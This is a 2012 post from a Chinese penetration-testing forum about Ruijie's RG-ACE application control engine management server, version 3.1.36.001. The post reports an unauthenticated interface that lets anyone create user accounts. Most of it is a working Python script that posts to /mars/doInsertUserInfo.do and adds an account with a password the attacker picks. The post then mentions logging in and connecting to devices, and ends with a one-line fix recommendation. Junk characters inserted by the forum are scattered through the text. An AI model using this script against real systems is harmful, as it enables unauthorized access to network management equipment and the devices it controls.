找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2124|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
$ o% o: G2 B# Q5 e+ Y9 n( D7 s2 ?# w+ k
- ?) ]' B( g! O5 N
测试的具体版本是; ]2 z0 k" f& Q! |/ N
产品名称: 锐捷应用控制引擎3 G/ r5 f: K8 E
版本号: 3.1.36.001 TC
$ ]0 i. Y; b+ w. q( `0 u编译时间: 201104291730: [5 E  C- @7 z, K

6 H' C  W, C) z+ J7 W! T
! Z3 h& L9 A: o漏洞证明:
0 I' p; {/ c! K* s# @+ ^/ x" Y* A + c5 A" L* W7 g/ V2 K

% |! v1 K3 J! H' X2 j9 i0 ~/ W/ A3 h, U8 b

" C" [9 s* K+ Y" Y9 p* w2 S0 k+ `
/ i' @" U; L6 G$ H
( I( B' a$ @) m- P0 ]# A% K6 ]执行脚本
4 G9 W1 b5 Z* r. `9 r* h" K#! /usr/bin/env python
; L) C# p* q+ s1 l#coding=gbk% G8 n9 X' Z' b! y$ Z5 F; s
#RG-ACE管理服务器 V3.1.36.001; z2 E! M1 `+ ]* ~2 a
import urllib2, urllib,cookielib
! b, }% K7 s' A" ]; q, H6 Ourl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP, M4 h& E9 ]- a
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))7 e$ N( l# c( L
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
, M+ ]& \7 j, @post=(("event","userManager.doInsertUserInfo"),9 f% w2 t. V4 _; L  e! j( ]9 M0 B
("useractionname","addButtonValue"),
0 d7 Q$ `1 f/ O("useropermanager","userManager"),
5 ^+ e% m( @4 {, u9 _("userName","t"), #######账号自己加
* u  O2 V' W  e8 O3 M6 k$ \("pwd","aaaaaa"),######密码自己加
; o) H" O/ s; Q/ Y, a# K, Y("trueName","ad"),. E  `' P/ u/ r  l" e
("email",""),0 h5 ]& F0 x& Z8 c. Y, q6 e2 z9 B
("mobilePhone",""),
" N9 o9 I. V; g9 z# `# G1 o("officePhone",""),( D1 W: x* l; G5 ~) d
("addr",""),8 N, H7 {* B8 N: D0 k9 g1 [2 }% V, G
("submit","确定")). v+ o6 h) }4 ^  h% A
urllib2.install_opener(opener)6 k; ^3 @& x+ x: M) J
p=urllib2.urlopen(url, urllib.urlencode(post)).read()& b0 ^$ m& D. E6 ~
print "Done"4 `2 R) E, l* E6 u2 x5 r0 b
8 {. b$ V: |, A9 k
登录,连接设备6 h( t8 o3 k. U$ D& G

) }& @% M5 r0 u5 Q2 G5 m, Z4 k; s7 K3 {/ |4 n3 X

3 l# z9 q" |5 S5 h- V! I- Q& p) R* c8 B, B

# Y# ^! l' U) T默认的管理员admin权限更大点
# u+ f0 f' O8 a
+ [' t4 S1 U0 D- h  M2 R+ z/ `- C* r; r* l% ~7 @( P$ w* b
+ H4 m( t, T  C, |

# d+ o6 {! u& C! p: m0 S) C! c- y( {) @
修复方案:5 o2 m4 e1 Q* t5 h. X& h, E6 L
加强对接口的权限验证$ h' R; u0 t4 }/ z4 s

8 \5 d5 V$ W; l& g/ y/ z) G
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表